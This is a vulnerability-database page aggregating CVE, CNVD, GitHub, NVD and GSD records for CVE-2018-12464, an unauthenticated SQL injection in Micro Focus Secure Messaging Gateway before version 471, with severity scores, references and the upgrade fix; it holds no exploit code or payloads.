cvelistv5 - CVE-2018-12464

CVE-2018-12464 (GCVE-0-2018-12464)

Vulnerability from cvelistv5 – Published: 2018-06-29 16:00 – Updated: 2024-09-17 01:55

Title

Unauthenticated SQL injection in Micro Focus Secure Messaging Gateway

Summary

Severity ?

10 (Critical)


                        
                          CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-89 - Unauthenticated SQL injection (CWE-89)

Assigner

microfocus

References

URL

Tags

	https://www.exploit-db.com/exploits/45083/	exploitx_refsource_EXPLOIT-DB
	https://support.microfocus.com/kb/doc.php?id=7023132	x_refsource_CONFIRM
	https://pentest.blog/unexpected-journey-6-all-way…	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	Micro Focus	Secure Messaging Gateway	Affected: unspecified , < 471 (custom)

Credits

Mehmet INCE from PRODAFT

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T08:38:05.924Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "45083",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Secure Messaging Gateway",
          "vendor": "Micro Focus",
          "versions": [
            {
              "lessThan": "471",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Mehmet INCE from PRODAFT"
        }
      ],
      "datePublic": "2018-06-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "Unauthenticated SQL injection (CWE-89)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-01-06T16:15:24",
        "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "shortName": "microfocus"
      },
      "references": [
        {
          "name": "45083",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/45083/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Please upgrade to Secure Messaging Gateway 471 or newer using the online update tool in the Secure Messaging Gateway management console."
        }
      ],
      "source": {
        "defect": [
          "GWAV-2258"
        ],
        "discovery": "EXTERNAL"
      },
      "title": "Unauthenticated SQL injection in Micro Focus Secure Messaging Gateway",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@microfocus.com",
          "DATE_PUBLIC": "2018-06-28T16:00:00.000Z",
          "ID": "CVE-2018-12464",
          "STATE": "PUBLIC",
          "TITLE": "Unauthenticated SQL injection in Micro Focus Secure Messaging Gateway"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Secure Messaging Gateway",
                      "version": {
                        "version_data": [
                          {
                            "affected": "\u003c",
                            "version_affected": "\u003c",
                            "version_value": "471"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Micro Focus"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Mehmet INCE from PRODAFT"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Unauthenticated SQL injection (CWE-89)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "45083",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/45083/"
            },
            {
              "name": "https://support.microfocus.com/kb/doc.php?id=7023132",
              "refsource": "CONFIRM",
              "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
            },
            {
              "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
              "refsource": "CONFIRM",
              "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Please upgrade to Secure Messaging Gateway 471 or newer using the online update tool in the Secure Messaging Gateway management console."
          }
        ],
        "source": {
          "defect": [
            "GWAV-2258"
          ],
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
    "assignerShortName": "microfocus",
    "cveId": "CVE-2018-12464",
    "datePublished": "2018-06-29T16:00:00Z",
    "dateReserved": "2018-06-15T00:00:00",
    "dateUpdated": "2024-09-17T01:55:32.229Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"471\", \"matchCriteriaId\": \"7549F67C-4E9D-4801-B4CE-E006F25CE090\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).\"}, {\"lang\": \"es\", \"value\": \"Una vulnerabilidad de inyecci\\u00f3n SQL en los componentes de cuarentena y administraci\\u00f3n web de Micro Focus Secure Messaging Gateway permite que un atacante remoto no autenticado ejecute declaraciones SQL arbitrarias contra la base de datos. Esto se puede explotar para crear una cuenta administrativa y usarla junto con CVE-2018-12465 para conseguir ejecutar c\\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.).\"}]",
      "id": "CVE-2018-12464",
      "lastModified": "2024-11-21T03:45:16.117",
      "metrics": "{\"cvssMetricV30\": [{\"source\": \"security@opentext.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.0\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\", \"baseScore\": 10.0, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 6.0}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.0\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:P/I:P/A:P\", \"baseScore\": 7.5, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 6.4, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2018-06-29T16:29:00.277",
      "references": "[{\"url\": \"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\", \"source\": \"security@opentext.com\"}, {\"url\": \"https://support.microfocus.com/kb/doc.php?id=7023132\", \"source\": \"security@opentext.com\"}, {\"url\": \"https://www.exploit-db.com/exploits/45083/\", \"source\": \"security@opentext.com\"}, {\"url\": \"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://support.microfocus.com/kb/doc.php?id=7023132\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://www.exploit-db.com/exploits/45083/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "security@opentext.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security@opentext.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-89\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-89\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-12464\",\"sourceIdentifier\":\"security@opentext.com\",\"published\":\"2018-06-29T16:29:00.277\",\"lastModified\":\"2024-11-21T03:45:16.117\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de inyecci\u00f3n SQL en los componentes de cuarentena y administraci\u00f3n web de Micro Focus Secure Messaging Gateway permite que un atacante remoto no autenticado ejecute declaraciones SQL arbitrarias contra la base de datos. Esto se puede explotar para crear una cuenta administrativa y usarla junto con CVE-2018-12465 para conseguir ejecutar c\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.).\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"security@opentext.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security@opentext.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"471\",\"matchCriteriaId\":\"7549F67C-4E9D-4801-B4CE-E006F25CE090\"}]}]}],\"references\":[{\"url\":\"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\",\"source\":\"security@opentext.com\"},{\"url\":\"https://support.microfocus.com/kb/doc.php?id=7023132\",\"source\":\"security@opentext.com\"},{\"url\":\"https://www.exploit-db.com/exploits/45083/\",\"source\":\"security@opentext.com\"},{\"url\":\"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://support.microfocus.com/kb/doc.php?id=7023132\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.exploit-db.com/exploits/45083/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

CNVD-2018-12540

Vulnerability from cnvd - Published: 2018-07-04

Title

Micro Focus Secure Messaging Gateway Web administration和quarantine组件SQL注入漏洞

Description

Micro Focus Secure Messaging Gateway（SMG）是英国Micro Focus公司的一套企业网络和消息系统出、入站保护软件。该产品包括病毒防护、反垃圾邮件、防DDos攻击和图像分析等功能。Web administration是其中的一个基于Web的管理组件；quarantine是其中的一个文件隔离组件。 Micro Focus SMG 471之前版本中的Web administration和quarantine组件存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意的SQL语句并创建管理账户。

Severity

高

Patch Name

Micro Focus Secure Messaging Gateway Web administration和quarantine组件SQL注入漏洞的补丁

Patch Description

Formal description

目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://support.microfocus.com/kb/doc.php?id=7023132

Reference

https://support.microfocus.com/kb/doc.php?id=7023132

Impacted products

Name
Micro Focus Secure Messaging Gateway <471

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2018-12464"
    }
  },
  "description": "Micro Focus Secure Messaging Gateway\uff08SMG\uff09\u662f\u82f1\u56fdMicro Focus\u516c\u53f8\u7684\u4e00\u5957\u4f01\u4e1a\u7f51\u7edc\u548c\u6d88\u606f\u7cfb\u7edf\u51fa\u3001\u5165\u7ad9\u4fdd\u62a4\u8f6f\u4ef6\u3002\u8be5\u4ea7\u54c1\u5305\u62ec\u75c5\u6bd2\u9632\u62a4\u3001\u53cd\u5783\u573e\u90ae\u4ef6\u3001\u9632DDos\u653b\u51fb\u548c\u56fe\u50cf\u5206\u6790\u7b49\u529f\u80fd\u3002Web administration\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u7ec4\u4ef6\uff1bquarantine\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u6587\u4ef6\u9694\u79bb\u7ec4\u4ef6\u3002\r\n\r\nMicro Focus SMG 471\u4e4b\u524d\u7248\u672c\u4e2d\u7684Web administration\u548cquarantine\u7ec4\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u7684SQL\u8bed\u53e5\u5e76\u521b\u5efa\u7ba1\u7406\u8d26\u6237\u3002",
  "discovererName": "unknown",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a\r\nhttps://support.microfocus.com/kb/doc.php?id=7023132",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2018-12540",
  "openTime": "2018-07-04",
  "patchDescription": "Micro Focus Secure Messaging Gateway\uff08SMG\uff09\u662f\u82f1\u56fdMicro Focus\u516c\u53f8\u7684\u4e00\u5957\u4f01\u4e1a\u7f51\u7edc\u548c\u6d88\u606f\u7cfb\u7edf\u51fa\u3001\u5165\u7ad9\u4fdd\u62a4\u8f6f\u4ef6\u3002\u8be5\u4ea7\u54c1\u5305\u62ec\u75c5\u6bd2\u9632\u62a4\u3001\u53cd\u5783\u573e\u90ae\u4ef6\u3001\u9632DDos\u653b\u51fb\u548c\u56fe\u50cf\u5206\u6790\u7b49\u529f\u80fd\u3002Web administration\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u7ec4\u4ef6\uff1bquarantine\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u6587\u4ef6\u9694\u79bb\u7ec4\u4ef6\u3002\r\n\r\nMicro Focus SMG 471\u4e4b\u524d\u7248\u672c\u4e2d\u7684Web administration\u548cquarantine\u7ec4\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u7684SQL\u8bed\u53e5\u5e76\u521b\u5efa\u7ba1\u7406\u8d26\u6237\u3002 \u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Micro Focus Secure Messaging Gateway Web administration\u548cquarantine\u7ec4\u4ef6SQL\u6ce8\u5165\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Micro Focus Secure Messaging Gateway \u003c471"
  },
  "referenceLink": "https://support.microfocus.com/kb/doc.php?id=7023132",
  "serverity": "\u9ad8",
  "submitTime": "2018-07-02",
  "title": "Micro Focus Secure Messaging Gateway Web administration\u548cquarantine\u7ec4\u4ef6SQL\u6ce8\u5165\u6f0f\u6d1e"
}

GHSA-QX98-CWXC-VRV6

Vulnerability from github – Published: 2022-05-13 01:34 – Updated: 2022-05-13 01:34

Details

Severity ?

9.8 (Critical)


                  
                    CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2018-12464"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-29T16:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5).",
  "id": "GHSA-qx98-cwxc-vrv6",
  "modified": "2022-05-13T01:34:47Z",
  "published": "2022-05-13T01:34:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12464"
    },
    {
      "type": "WEB",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway"
    },
    {
      "type": "WEB",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45083"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

FKIE_CVE-2018-12464

Vulnerability from fkie_nvd - Published: 2018-06-29 16:29 - Updated: 2024-11-21 03:45

Severity ?

10.0 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security@opentext.com	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	security@opentext.com	https://support.microfocus.com/kb/doc.php?id=7023132
	security@opentext.com	https://www.exploit-db.com/exploits/45083/
	af854a3a-2127-422b-91ae-364da2661108	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	af854a3a-2127-422b-91ae-364da2661108	https://support.microfocus.com/kb/doc.php?id=7023132
	af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45083/

Impacted products

	Vendor	Product	Version
	microfocus	secure_messaging_gateway	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7549F67C-4E9D-4801-B4CE-E006F25CE090",
              "versionEndExcluding": "471",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5)."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de inyecci\u00f3n SQL en los componentes de cuarentena y administraci\u00f3n web de Micro Focus Secure Messaging Gateway permite que un atacante remoto no autenticado ejecute declaraciones SQL arbitrarias contra la base de datos. Esto se puede explotar para crear una cuenta administrativa y usarla junto con CVE-2018-12465 para conseguir ejecutar c\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.)."
    }
  ],
  "id": "CVE-2018-12464",
  "lastModified": "2024-11-21T03:45:16.117",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 10.0,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.0,
        "source": "security@opentext.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-06-29T16:29:00.277",
  "references": [
    {
      "source": "security@opentext.com",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
    },
    {
      "source": "security@opentext.com",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
    },
    {
      "source": "security@opentext.com",
      "url": "https://www.exploit-db.com/exploits/45083/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/45083/"
    }
  ],
  "sourceIdentifier": "security@opentext.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security@opentext.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GSD-2018-12464

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2018-12464

Aliases

CVE-2018-12464

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-12464",
